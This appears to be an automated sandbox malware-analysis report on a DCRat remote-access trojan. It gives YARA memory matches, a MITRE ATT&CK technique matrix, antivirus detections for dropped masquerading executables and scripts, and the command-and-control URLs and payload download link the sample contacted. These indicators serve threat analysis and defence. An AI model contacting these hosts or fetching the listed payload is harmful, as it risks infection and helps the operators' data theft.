Source: Yara match	File source: 00000025.00000002.1967727670.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1967465796.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1878443146.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1878443146.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1967465796.000000000239F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1966435389.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WinLatency.exe PID: 7636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Registry.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Registry.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 2872, type: MEMORYSTR
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000006.00000002.1880642049.0000000012F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1967727670.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1967465796.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1878443146.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1878443146.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1967465796.000000000239F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1966435389.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WinLatency.exe PID: 7636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Registry.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Registry.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 2872, type: MEMORYSTR
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	111 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	137 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	34 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
LaRHzSijsq.exe	58%	ReversingLabs	Win32.Trojan.Generic
LaRHzSijsq.exe	100%	Avira	TR/Downloader.Gen9
LaRHzSijsq.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\0e88ad83-c250-45ca-adc9-aeea84770856.vbs	100%	Avira	VBS/Runner.VPXJ
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\db8b1070-5cc6-4c5d-9632-a5481171a28d.vbs	100%	Avira	VBS/Starter.VPVT
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\Public\Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label
http://ca91547.tw1.ru/@==gbJBzYuFDT	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f8	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmd	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f808=b2c0a37eb61845d3c0e712bac039aad1&438f148c0e5f9286e56e53eb6890b7d4=QOxEmYzIDMjNGOxEWY5cDZyYzY1kTMkNjM5EjY0MTOiRjNjNzNlVTN&kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU	100%	Avira URL Cloud	malware
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ca91547.tw1.ru	92.53.106.114	true	true		unknown
raw.githubusercontent.com	185.199.109.133	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN	true	Avira URL Cloud: malware	unknown
http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f808=b2c0a37eb61845d3c0e712bac039aad1&438f148c0e5f9286e56e53eb6890b7d4=QOxEmYzIDMjNGOxEWY5cDZyYzY1kTMkNjM5EjY0MTOiRjNjNzNlVTN&kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU	true	Avira URL Cloud: malware	unknown
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W	true	Avira URL Cloud: malware	unknown
https://raw.githubusercontent.com/UnhitRat/Avast/refs/heads/main/Optmz.exe	false		high
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl